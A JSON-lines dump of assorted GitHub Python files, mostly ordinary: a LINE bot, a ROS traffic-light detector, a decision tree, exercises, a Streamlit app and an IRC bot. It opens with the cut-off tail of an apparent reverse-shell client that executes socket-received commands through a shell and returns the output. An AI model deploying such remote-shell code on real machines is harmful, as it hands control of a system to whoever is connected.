0:\n cmd = subprocess.Popen(data[:].decode(\"utf-8\"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n output_bytes = cmd.stdout.read() + cmd.stderr.read()\n output_str = str(output_bytes, \"utf-8\")\n s.send(str.encode(output_str + str(os.getcwd()) + '> '))\n print(output_str)\n s.close()\n\n\ndef main():\n socket_create()\n socket_connect()\n receive_commands()\n\n\nmain()\n","repo_name":"buckyroberts/Turtle","sub_path":"Single_Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"72"} +{"seq_id":"73234776874","text":"from System.Collections.Generic import List\nfrom OpenMetaverse import UUID\nfrom ..rotational import Rotational\n\npeople = Rotational(\"av\")\n\nclass AvatarNames(object):\n name_table = {} # this can be global, it can't differ between instances\n reverse_name_table = {}\n @classmethod\n def add_name(cls, success, names, badIDs):\n if success:\n for i in names:\n cls.name_table[i.ID] = i.DisplayName\n cls.reverse_name_table[i.DisplayName.lower()] = i.ID\n @classmethod\n def name_from_uuid(cls, state, uuid):\n if uuid in cls.name_table:\n return cls.name_table[uuid]\n else:\n l = List[UUID]()\n l.Add(uuid)\n state[\"sl\"].Avatars.GetDisplayNames(l, cls.add_name)\n return None\n @classmethod\n def uuid_from_name(cls, state, name):\n if name.lower() in cls.reverse_name_table:\n return cls.reverse_name_table[name.lower()]\n else: # shouldn't happen unless the name given was a typo\n return None\n\ndef name_of(state, avatar):\n return \"[{0}] [{1} ({2}]\".format(*[\n people.add(avatar.ID),\n AvatarNames.name_from_uuid(state, avatar.ID) if\n AvatarNames.name_from_uuid(state, avatar.ID)\n else \"[display name pending]\",\n avatar.Name])\n \n","repo_name":"Zekka/bakten","sub_path":"bot/slutil/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35572580831","text":"import json\nimport os\nimport socket\n\nfrom flask import Flask, request, abort\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage\n)\nfrom dotenv import load_dotenv\n\nfrom actions.ActionSearchImages import store_all_shop_names\nfrom intents.IntentDispatcher import dispatch\nimport config.Logger\nimport logging as LOGGER\n\n\"\"\"\n configurations\n\"\"\"\nLOGGER.getLogger(__name__)\nload_dotenv()\n\n\"\"\"\n 全域變數\n\"\"\"\nline_bot_api = LineBotApi(os.getenv('CHANNEL_ACCESS_TOKEN'))\nhandler = WebhookHandler(os.getenv('CHANNEL_SECRET'))\napp = Flask(__name__)\n\n\"\"\"\n call back function\n\"\"\"\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n LOGGER.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n LOGGER.error(\"Invalid signature. Please check your channel access token/channel secret.\")\n abort(400)\n\n return 'OK'\n\n\"\"\"\n 清除店家快取資料\n\"\"\"\n\n@app.route(\"/cleanShopCache\", methods=['GET'])\ndef clean_shop_cache():\n host_name = socket.gethostname()\n ip_address = socket.gethostbyname(host_name)\n\n if request.remote_addr == ip_address:\n store_all_shop_names()\n else:\n abort(403)\n\n return json.dumps({'success': True}), 200, {'ContentType': 'application/json'}\n\n\"\"\"\n 處理 Line 文字訊息\n :param event: 事件\n\"\"\"\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n profile = line_bot_api.get_profile(event.source.user_id)\n LOGGER.info(f'Line 使用者 ID: {profile.user_id}')\n LOGGER.info(f'Line 使用者顯示名稱: {profile.display_name}')\n LOGGER.info(f'Line 使用者傳送訊息: {event.message.text}')\n\n reply_message = dispatch(intent=event.message.text)\n if reply_message is not None:\n line_bot_api.reply_message(event.reply_token, reply_message)\n\nif __name__ == \"__main__\":\n store_all_shop_names()\n app.run()\n","repo_name":"gordonfang199649/food_delivery_rider_tool","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35388953355","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport tf\nimport yaml\nfrom math import sqrt\nfrom scipy.spatial import KDTree\n\nSTATE_COUNT_THRESHOLD = 3\n\nclass TLDetector(object):\n def __init__(self):\n\n # Exchange comment will let you see the estimated traffic light color and processing time \n rospy.init_node('tl_detector')\n #rospy.init_node('tl_detector', log_level=rospy.DEBUG)\n\n self.pose = None\n self.waypoints = None\n self.camera_image = None\n self.lights = []\n\n sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)\n sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)\n\n config_string = rospy.get_param(\"/traffic_light_config\")\n self.config = yaml.load(config_string)\n\n self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)\n\n self.bridge = CvBridge()\n self.light_classifier = TLClassifier()\n self.listener = tf.TransformListener()\n\n self.state = TrafficLight.UNKNOWN\n self.last_state = TrafficLight.UNKNOWN\n self.last_wp = -1\n self.state_count = 0\n\n # Define range in which traffic lights can be seen\n self.range = 100\n\n # Stores accumulated processing time of image callback\n self.image_cb_total_time = 0.0\n\n # Stores how often image callback has been called\n self.image_cb_counter = 0\n\n # Boolean if image is currently available\n self.has_image = False\n\n self.loop()\n \n def loop(self): \n # loop implemented rather than spin to control the frequency precisely\n rate = rospy.Rate(5)\n \n while not rospy.is_shutdown():\n # if pose and base_waypoints are filled\n if self.has_image:\n self.process_image()\n rate.sleep()\n\n # Stores subscribed current_pose of car\n def pose_cb(self, msg):\n self.pose = msg\n\n # Stores subscribed base_waypoints of car\n def waypoints_cb(self, waypoints):\n self.waypoints = waypoints\n waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y] for waypoint in waypoints.waypoints]\n self.waypoint_tree = KDTree(waypoints_2d)\n\n # Stores subscribed list of traffic lights tha are in the map\n def traffic_cb(self, msg):\n self.lights = msg.lights\n\n # Stores sensor image\n def image_cb(self, msg):\n self.has_image = True\n self.camera_image = msg\n\n # Process sensor image\n def process_image(self):\n \"\"\"Identifies red lights in the incoming camera image and publishes the index\n of the waypoint closest to the red light's stop line to /traffic_waypoint\n\n Args:\n msg (Image): image from car-mounted camera\n\n \"\"\"\n\n # Store current time\n t1 = rospy.get_time()\n light_wp, state = self.process_traffic_lights()\n\n '''\n Publish upcoming red lights at camera frequency.\n Each predicted state has to occur `STATE_COUNT_THRESHOLD` number\n of times till we start using it. Otherwise the previous stable state is\n used.\n '''\n if self.state != state:\n self.state_count = 0\n self.state = state\n elif self.state_count >= STATE_COUNT_THRESHOLD:\n self.last_state = self.state\n light_wp = light_wp if state == TrafficLight.RED else -1\n self.last_wp = light_wp\n self.upcoming_red_light_pub.publish(Int32(light_wp))\n else:\n self.upcoming_red_light_pub.publish(Int32(self.last_wp))\n self.state_count += 1\n\n # Store current time\n t2 = rospy.get_time()\n\n # Print average processing time for this callback\n self.image_cb_total_time += (t2 - t1)\n self.image_cb_counter += 1\n self.has_image = False\n rospy.logdebug(\"TL Detector Current proc. time : %f s\", (t2 - t1))\n rospy.logdebug(\"TL Detector Average proc. time : %f s\", self.image_cb_total_time / self.image_cb_counter)\n\n def get_closest_waypoint(self, x, y):\n closest_idx = self.waypoint_tree.query([x, y], 1)[1]\n return closest_idx\n\n def get_light_state(self, light):\n \"\"\"Determines the current color of the traffic light\n\n Args:\n light (TrafficLight): light to classify\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n if(not self.has_image):\n self.prev_light_loc = None\n return False\n\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"bgr8\")\n\n #Get classification\n classified_state = self.light_classifier.get_classification(cv_image)\n rospy.logdebug(\"Light state %s, classified state: %s\", light.state, classified_state)\n return classified_state\n\n def get_distance(self, x1, y1, x2, y2):\n return sqrt( (x1-x2)**2 + (y1-y2)**2 )\n\n def process_traffic_lights(self):\n \"\"\"Finds closest visible traffic light, if one exists, and determines its\n location and color\n\n Returns:\n int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists)\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n light = None\n line_wp_idx = -1\n\n # List of positions that correspond to the line to stop in front of for a given intersection\n stop_line_positions = self.config['stop_line_positions']\n if(self.pose):\n\n # Get waypoint index of the car\n x_car = self.pose.pose.position.x\n y_car = self.pose.pose.position.y\n car_wp_idx = self.get_closest_waypoint(x_car, y_car)\n\n # Set maximum front distance to next traffic light\n if self.waypoints:\n max_dist = min(len(self.waypoints.waypoints), self.range)\n else:\n max_dist = self.range\n\n # Loop over list of traffic lights to check distance to the car\n for i, traffic_light in enumerate(self.lights):\n # Get stop line waypoint index\n line = stop_line_positions[i]\n temp_wp_idx = self.get_closest_waypoint(line[0], line[1])\n # Find closest stop line waypoint index\n d = temp_wp_idx - car_wp_idx\n\n if 0 <= d < max_dist:\n max_dist = d\n light = traffic_light\n line_wp_idx = temp_wp_idx\n\n if light:\n \n # Get light status\n state = self.get_light_state(light)\n #print(\"Traffic light found:\", car_wp_idx, line_wp_idx, state)\n return line_wp_idx, state\n\n rospy.logdebug(\"No traffic light within sensor image\")\n self.waypoints = None\n return -1, TrafficLight.UNKNOWN\n\nif __name__ == '__main__':\n try:\n TLDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","repo_name":"appinho/fastnfurios","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":7550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2544257706","text":"n = int(input())\nmatrix = [[int(x) for x in input().split()] for i in range(n)]\nwhile True:\n command = input()\n if command == \"END\":\n break\n action, row, col, value = command.split()\n row = int(row)\n col = int(col)\n value = int(value)\n if row in range(0, len(matrix)) and col in range(0, len(matrix)):\n if action == \"Add\":\n matrix[row][col] += value\n elif action == \"Subtract\":\n matrix[row][col] -= value\n else:\n print(\"Invalid coordinates\")\nfor el in matrix:\n print(' '.join(str(a) for a in el))\n","repo_name":"toshhPOP/SoftUniCourses","sub_path":"Python-Advanced/Multidimentional_Lists/matrix_modification.py","file_name":"matrix_modification.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14816535449","text":"\n\nimport time\n\nimport caffe2.python.hypothesis_test_util as hu\nimport hypothesis.strategies as st\nimport numpy as np\nfrom caffe2.python import core, workspace\nfrom hypothesis import given, settings\n\n\nnp.set_printoptions(precision=6)\n\n\nclass TestSpeedFloatToFusedRandRowwiseQuantized(hu.HypothesisTestCase):\n @given(\n bitwidth_=st.sampled_from([1, 2, 4, 8]),\n random_=st.sampled_from([True, False]),\n data_shape_=st.sampled_from(\n [\n np.array([32, 512]),\n np.array([1, 1024]),\n np.array([1024, 1024]),\n np.array([1024, 1224]),\n np.array([512, 969]),\n ]\n ),\n **hu.gcs\n )\n @settings(deadline=10000)\n def test_speed_of_rand_quantization(self, bitwidth_, random_, data_shape_, gc, dc):\n X1 = np.random.rand(data_shape_[0], data_shape_[1]).astype(np.float32)\n X2 = np.random.rand(data_shape_[0], data_shape_[1]).astype(np.float32)\n\n sub_scale_sum_net = core.Net(\"sub_scale_sum\")\n sub_op = core.CreateOperator(\"Sub\", [\"X1\", \"X2\"], [\"dX\"])\n scale_op = core.CreateOperator(\"Scale\", [\"dX\"], [\"dX\"], scale=0.023)\n sum_op = core.CreateOperator(\"Sum\", [\"X2\", \"dX\"], [\"X2\"])\n sub_scale_sum_net.Proto().op.extend([sub_op, scale_op, sum_op])\n\n enc_net = core.Net(\"enc\")\n enc_op = core.CreateOperator(\n \"FloatToFusedRandRowwiseQuantized\",\n [\"dX\"],\n [\"Y\"],\n bitwidth=bitwidth_,\n random=random_,\n )\n enc_net.Proto().op.extend([enc_op])\n\n dec_net = core.Net(\"dec\")\n dec_op = core.CreateOperator(\n \"FusedRandRowwiseQuantizedToFloat\", [\"Y\"], [\"decX\"]\n )\n dec_net.Proto().op.extend([dec_op])\n\n workspace.FeedBlob(\"X1\", X1)\n workspace.FeedBlob(\"X2\", X2)\n\n workspace.CreateNet(sub_scale_sum_net)\n workspace.CreateNet(enc_net)\n workspace.CreateNet(dec_net)\n workspace.RunNet(sub_scale_sum_net)\n workspace.RunNet(enc_net)\n workspace.RunNet(dec_net)\n\n sub_scale_sum_time = 0\n enc_time = 0\n dec_time = 0\n times = 10\n for _ in range(times):\n start = time.time()\n workspace.RunNet(sub_scale_sum_net)\n end = time.time()\n sub_scale_sum_time += end - start\n\n start = time.time()\n workspace.RunNet(enc_net)\n end = time.time()\n enc_time += end - start\n\n start = time.time()\n workspace.RunNet(dec_net)\n end = time.time()\n dec_time += end - start\n\n print(\"Sub+Scale+Sum time: {} ms\".format(sub_scale_sum_time / times * 1000))\n print(\n \"Quantizing time: {} ms ({}X)\".format(\n enc_time / times * 1000, enc_time / sub_scale_sum_time\n )\n )\n print(\n \"De-quantizing time: {} ms ({}X)\".format(\n dec_time / times * 1000, dec_time / sub_scale_sum_time\n )\n )\n\n\nif __name__ == \"__main__\":\n import unittest\n\n unittest.main()\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/operator_test/rand_quantization_op_speed_test.py","file_name":"rand_quantization_op_speed_test.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"34223489250","text":"\nimport pandas as pd\nimport math\nTraining_data = pd.read_csv('mush_train.data',header = None)\nTest_data = pd.read_csv('mush_test.data',header = None)\n\n\nattrLen = len(Training_data.columns)-1\n\n#print(Training_data.loc[Training_data[0] == 'p'] )\n \n\ndef split(data, dupAttrList):\n rows = len(data) \n maxProb = 1\n bestAttr = -1\n for i in dupAttrList:\n prob = 0 #prob of the target given an attribute\n for j in attrValues[i]:\n temp = data.loc[data[i+1] == j, [0,i+1]]\n tempLen = len(temp)\n p = len(temp.loc[temp[0] == 'p'])\n e = len(temp.loc[temp[0] == 'e'])\n logp = 0\n loge = 0\n if(tempLen > 0):\n if p > 0:\n logp = (math.log(p/tempLen))/(math.log(2))\n if e > 0:\n loge = (math.log(e/tempLen))/(math.log(2))\n prob = prob + -1 * tempLen/rows * ((p/tempLen)*logp+(e/tempLen)*loge)\n if(prob <= maxProb):\n maxProb = prob\n bestAttr = i\n return bestAttr\n \n\n \n \n \n \n\ndef build_tree(Training_data, root):\n dupAttrList = []\n for i in range(attrLen):\n dupAttrList.append(i)\n max_height = 0;\n attr = split(Training_data, dupAttrList)\n root = attr\n dupAttrList.remove(attr)\n lst = [] \n i = len(attrValues[attr]) - 1\n while i >= 0:\n lst.append([attrValues[attr][i],attr,0])\n i = i-1\n data[attr] = Training_data;\n i = 0 \n Node_Count = 0\n while(len(lst) != 0):\n entry = lst.pop()\n Node_Count = Node_Count + 1; \n attrToSplitOn = entry[1]\n valueToSplitOn = entry[0]\n DataToSplitOn = data[attrToSplitOn]\n SplitData = DataToSplitOn.loc[DataToSplitOn[attrToSplitOn+1] == valueToSplitOn]\n p = len(SplitData.loc[SplitData[0] == 'p'])\n e = len(SplitData.loc[SplitData[0] == 'e'])\n height = entry[2]+1\n if height > max_height:\n max_height = height\n lenSplitData = len(SplitData)\n if(lenSplitData == 0):\n p = len(DataToSplitOn.loc[DataToSplitOn[0] == 'p'])\n e = len(DataToSplitOn.loc[DataToSplitOn[0] == 'e'])\n if p > e:\n tree[attrToSplitOn][valueToSplitOn] = 'p'\n else:\n tree[attrToSplitOn][valueToSplitOn] = 'e'\n else:\n if p == lenSplitData:\n tree[attrToSplitOn][valueToSplitOn] = 'p'\n elif e == lenSplitData:\n tree[attrToSplitOn][valueToSplitOn] = 'e'\n else:\n attr = split(SplitData, dupAttrList)\n dupAttrList.remove(attr)\n data[attr] = SplitData;\n tree[attrToSplitOn][valueToSplitOn] = attr\n i = len(attrValues[attr]) - 1\n while i >= 0:\n lst.append([attrValues[attr][i],attr,height])\n i = i-1\n for i in dupAttrList:\n del tree[i]\n return root, max_height+1, Node_Count;\n \n \n\nattrValues = []\n\nattrValues.append(['b', 'c', 'x', 'f', 'k', 's'])\nattrValues.append(['f', 'g', 'y', 's'])\nattrValues.append(['n','b','c','g','r','p','u','e','w','y'])\nattrValues.append(['t','f'])\nattrValues.append(['a','l','c','y','f','m','n','p','s'])#4\nattrValues.append(['a','d','f','n'])\nattrValues.append(['c','w','d'])\nattrValues.append(['b','n'])\nattrValues.append(['k','n','b','h','g','r','o','p','u','e','w','y'])\nattrValues.append(['e','t'])\nattrValues.append(['b','c','u','e','z','r','m'])\nattrValues.append(['f','y','k','s'])\nattrValues.append(['f','y','k','s'])\nattrValues.append(['n','b','c','g','o','p','e','w','y'])\nattrValues.append(['n','b','c','g','o','p','e','w','y'])\nattrValues.append(['p','u'])\nattrValues.append(['n','o','w','y'])\nattrValues.append(['n','o','t'])\nattrValues.append(['c','e','f','l','n','p','s','z'])\nattrValues.append(['k','n','b','h','r','o','u','w','y'])\nattrValues.append(['a','c','n','s','v','y'])\nattrValues.append(['g','l','m','p','u','w','d'])\n\n\n\nattrList = []\n\n\ndata = {}\n\ntarget = ['p','e']\n\ndupAttrList = attrList\n\n\ntree = {}\n\nfor i in range(attrLen):\n attrList.append(i)\n\ndef Intialize(tree):\n for i in attrList:\n tree[i] = {}\n data[i] = {}\n for j in attrValues[i]:\n tree[i][j] = -1\n \n #duplicate Attribute List for not repeating the attributes\n\n\n\nroot = None\nIntialize(tree)\nroot, height, Node_count = build_tree(Training_data, root) #build tree\n\n\n#deleting the entries of the attributes that are not used\n\n \nprint(tree)\n\nprint('Height of the tree is',height)\n\nprint('Number of the nodes in the tree are',Node_count)\n\nTraining_DataLength = len(Training_data)\ni = 0\n\n\ndef accuracy(tree, data, root):\n dataLength = len(data)\n acc = 0\n i = 0\n while i < dataLength:\n result = root\n while True:\n result = tree[result][data.iloc[i][result+1]]\n if result == 'e' or result == 'p':\n break\n if data.iloc[i][0] == result:\n acc = acc + 1\n i = i+1\n return (acc/dataLength)*100;\n \n\ntrainingAccuracy = accuracy(tree, Training_data, root)\ntestingAccuracy = accuracy(tree, Test_data, root)\nprint('Testing accuracy is', testingAccuracy)\n\nprint('Training accuracy is', trainingAccuracy)\n\n#Merging datasets for testing accuracy based on dataset split\n\nmushroom_data = pd.concat([Training_data, Test_data])\nlenMushroom = len(mushroom_data)\n#for problem 2.7\n\ni = 10 #starting with 50% of training data and remaing of test data\nwhile i < 100:\n trainLength = math.ceil((i/100)*lenMushroom)\n testLength = lenMushroom - trainLength\n #print(trainLength, testLength)\n Training_data = mushroom_data.iloc[0:trainLength]\n Test_data = mushroom_data.iloc[trainLength+1:lenMushroom]\n tree = {}\n root = None\n Intialize(tree)\n #print(tree)\n root, height, Node_count = build_tree(Training_data, root)\n #print(tree)\n trainingAccuracy = accuracy(tree, Training_data, root)\n #print('height', height)\n #print('Node_count',Node_count)\n testingAccuracy = accuracy(tree, Test_data, root)\n print(i)\n print('with',i,'% split of training and',100-i,'% split of testing data')\n print('Testing accuracy is', testingAccuracy)\n print('Training accuracy is', trainingAccuracy)\n i = i + 10\n \n \n","repo_name":"ravitejaCR7/Machine-Learning","sub_path":"Decision Tree/DecisionMushTree.py","file_name":"DecisionMushTree.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"4524229514","text":"# print even and odd numbers in any range\n\ndef even_odd(arr):\n for i in arr:\n if i % 2 == 0:\n print(f'{i} is even')\n else:\n print(f'{i} is odd')\n\nl = []\nfor i in range(100):\n l.append(i)\n\n\neven_odd(l)","repo_name":"elip55/python_challenges","sub_path":"interview_q/even_odd.py","file_name":"even_odd.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16533056547","text":"import sys\n\nsys.stdin = open('input.txt')\n\nT = int(input())\n\nfor tc in range(1, T+1):\n word = list(input())\n temp = word\n ans1 = '.'+'.#..'*len(word)\n ans2 = '.#.#'*len(word)+'.'\n print(ans1)\n print(ans2)\n while temp:\n w = temp.pop(0)\n if len(temp) == 0:\n print('#.'+w+'.#')\n else:\n print('#.'+w+'.', end='')\n print(ans2)\n print(ans1)","repo_name":"yuueuni/algorithm","sub_path":"swea/SWEA_D3/re/4751/4751.py","file_name":"4751.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71545217192","text":"import streamlit as st\nfrom langchain.prompts import PromptTemplate\nfrom langchain.llms import OpenAI\n\n# Template for prompt\ntemplate = \"\"\"\n Below is an angry rant message.\n The writer wants to send this message to the recipient.\n The message can be very rough and messy, with curses and bad word choices.\n Turn it into a polite complaint message, while maintaining the overall meaning.\n It should be a message that the recipient can understand and accept.\n\n Your goal is to:\n - Properly address the person's concerns\n - Adjust the tone to the requested level of politeness (0-10)\n - Convert the input into the requested language (English, Spanish, French)\n - Maintain the overall meaning of the input\n - Make it as long as the original input\n\n Here is the request:\n Message to convert: {angry_rant}\n Level of politeness: {level}\n Language: {language}\n\n Polite complaint message:\n\"\"\"\n\nprompt = PromptTemplate(\n input_variables=[\"angry_rant\", \"level\", \"language\"],\n template=template,\n)\n\nst.set_page_config(page_title=\"Polite Rant Generator\", page_icon=\":sunglasses:\")\n\nst.markdown(\n \"\"\"\n

    Angry Rant 😡 to Polite Rant 🙏

    \n \"\"\",\n unsafe_allow_html=True,\n)\n\nco1, co2 = st.columns(2)\nwith co1:\n st.image(\n image=\"./images/angry-1294679.svg\",\n width=200,\n )\nwith co2:\n st.write(\"### Let's fix this!\")\n st.markdown(\n \"Turn your Angry Rant 😡 into a Polite Rant 🙏 with just a few clicks. Express your frustrations, select the level of politeness, and let the app craft a more civilized version of your complaints. It's the perfect tool to maintain a positive tone while complaining 😊✨\"\n )\n\nst.write(\n \"### This app uses OpenAI API key. You can get one [here](https://beta.openai.com/).\"\n)\n\n\ndef get_api_key():\n return st.text_input(label=\"Enter your OpenAI API key here\")\n\n\nopenai_api_key = get_api_key()\n\n\ndef get_llm(openai_api_key):\n try :\n return OpenAI(\n temperature=0.5,\n openai_api_key=openai_api_key,\n )\n except Exception as e:\n st.error(f\"An error occurred while getting LLM: {e}\")\n\n\ndef validate_input(openai_api_key, angry_rant):\n if not openai_api_key:\n st.warning(\"Please enter your OpenAI API key\", icon=\"🙏\")\n return False\n if not angry_rant.strip():\n st.warning(\"Please enter a rant before generating\", icon=\"🙏\")\n return False\n if len(angry_rant.split()) > 400:\n st.warning(\"Please enter a rant of less than 400 words\", icon=\"🙏\")\n return False\n return True\n\n\n# Setting columns to divide the page\ncol1, col2 = st.columns(2)\nwith col1:\n st.write(\"## Vent your anger\")\n angry_rant = st.text_area(label=\"Enter your angry rant here\", height=300)\n\nwith col2:\n st.write(\"## Settings\")\n st.write(\"Select the level of politeness:\")\n level = st.slider(\n label=\"Level of politeness\", min_value=0, max_value=10, value=5, step=1\n )\n st.write(\"Select the language:\")\n language = st.selectbox(label=\"Language\", options=[\"English\", \"Spanish\", \"French\", \"Korean\"])\n\nif st.button(label=\"Generate!\"):\n if validate_input(openai_api_key, angry_rant):\n llm = get_llm(openai_api_key)\n st.write(\"## Result\")\n st.write(\"This is the civilized version of your rant:\")\n try:\n prompt_polite_rant = prompt.format(\n angry_rant=angry_rant, level=level, language=language\n )\n except Exception as e:\n st.error(f\"An error occurred while formating the prompt: {e}\")\n try:\n polite_rant = llm(prompt_polite_rant)\n st.write(polite_rant)\n except Exception as e:\n if e.code == 'invalid_api_key':\n st.warning(\"API key is invalid. Please check your OpenAI API key\")\n else:\n st.error(f\"An error occurred while generating the polite rant: {e}\")\n","repo_name":"Sigurrosist/AngryRant2PoliteRant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16786225989","text":"# -*- coding: utf-8 -*-\nimport requests\nimport sys\nimport socket\nimport thread\n\nclass Str :\n def _init_(self):\n self.str = \"\"\n\ndef webCrawler(query) :\n r = query\n s = 'https://www.youtube.com/results?search_query='\n s = s + r\n s = bytes(s.encode('utf8'))\n r = requests.get(s)\n s = r.text.encode('utf8', 'ignore')\n s = str(s)\n delim = 'href=\"/watch?v='\n index = s.find(delim)\n index2 = s.find('\"', index+len(delim))\n temp = 'https://www.youtube.com'\n output = temp + s[index+6:index2]\n return output\n\ndef signUpIRC(channelName, clientSocket) :\n message = \"NICK bot\\r\\nUSER b03204032\\r\\n\"\n clientSocket.send(bytes(message.decode('utf8').encode('utf8')))\n message = \"JOIN #\" + channelName + \"\\r\\nPRIVMSG #\" + channelName + \" :I'm b03204032\\r\\n\"\n clientSocket.send(bytes(message.decode('utf8').encode('utf8')))\n\ndef sendThread(clientSocket, nameToSend) :\n isExit = False\n buff = \"\"\n while True:\n strToInput = raw_input()\n if strToInput == \"!e\" :\n isExit = True\n if isExit == True :\n break\n # strToInput = \"PRIVMSG \" + nameToSend.str + \" :\" + strToInput.str + \"\\r\\n\"\n clientSocket.send(\"PRIVMSG \")\n clientSocket.send(bytes(nameToSend.str.decode('utf8').encode('utf8')))\n clientSocket.send(\" :\")\n clientSocket.send(bytes(strToInput.decode('utf8').encode('utf8')))\n clientSocket.send(\"\\r\\n\")\n print(\"你離開了聊天室\")\n return\n\ndef recvMsgParsing(msg) :\n orgMessage = msg.str\n delim = \"PRIVMSG bot :\"\n index = msg.str.find(delim)\n if index == -1 :\n return 0\n index += len(delim)\n msg.str = orgMessage[index:len(orgMessage)]\n while msg.str[len(msg.str)-1] == '\\n' or msg.str[len(msg.str)-1] == '\\r':\n msg.str = msg.str[0:len(msg.str)-1]\n\ndef recvNumParsing(msg) :\n orgMessage = msg.str\n isDigit = True\n delim = \"PRIVMSG bot :\"\n index = msg.str.find(delim)\n if index == -1 :\n return 0\n index += len(delim)\n msg.str = orgMessage[index:len(orgMessage)]\n while msg.str[len(msg.str)-1] == '\\n' or msg.str[len(msg.str)-1] == '\\r':\n msg.str = msg.str[0:len(msg.str)-1]\n if msg.str.isdigit() == False :\n return 0\n else :\n return int(msg.str)\n\ndef messageQuery(message, response, clientSocket, nameToSend) :\n if message.str == \"Capricorn\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Aquarius\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Pisces\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Aries\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Taurus\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Gemini\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Cancer\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Leo\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Virgo\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Libra\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Scorpio\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Sagittarius\" :\n response.str = \"nice day!\"\n return True;\n\n if message.str == \"!chat\" :\n while nameToSend.str[len(nameToSend.str)-1] == '\\n' or nameToSend.str[len(nameToSend.str)-1] == '\\r':\n nameToSend.str = nameToSend.str[0:len(nameToSend.str)-1]\n print(nameToSend.str)\n print(\"加入了聊天室!\")\n garbNum = -1\n thread.start_new_thread(sendThread, (clientSocket, nameToSend, ))\n while True:\n msg = Str()\n msg.str = clientSocket.recv(4096).decode('utf8')\n garbNum = recvMsgParsing(msg)\n if garbNum == 0 :\n continue\n if msg.str == \"!bye\" :\n print(nameToSend.str)\n print(\"離開了聊天室\\n\")\n break\n print(msg.str)\n\n if message.str == \"!guess\" :\n down = 1\n bingo = 5\n up = 10\n isLose = True\n response = \"PRIVMSG \" + nameToSend.str + \" :\" + \"guess a number between 1 and 10!(not include 1 and 10)\\r\\n\"\n clientSocket.send(bytes(response.decode('utf8').encode('utf8')))\n while isLose == True :\n msg = Str()\n msg.str = clientSocket.recv(4096).decode('utf8')\n staus = recvNumParsing(msg)\n if staus == 0 :\n continue\n if staus == bingo :\n response = \"PRIVMSG \" + nameToSend.str + \" :bingo!\\r\\n\"\n clientSocket.send(bytes(response.decode('utf8').encode('utf8')))\n isLose = False\n break;\n if staus > bingo and staus < up :\n up = staus\n response = \"PRIVMSG \" + nameToSend.str + \" :between \" + str(down) + \" and \" + str(up) + \"!\\r\\n\"\n clientSocket.send(bytes(response.decode('utf8').encode('utf8')))\n elif staus < bingo and staus > down :\n down = staus\n response = \"PRIVMSG \" + nameToSend.str + \" :between \" + str(down) + \" and \" + str(up) + 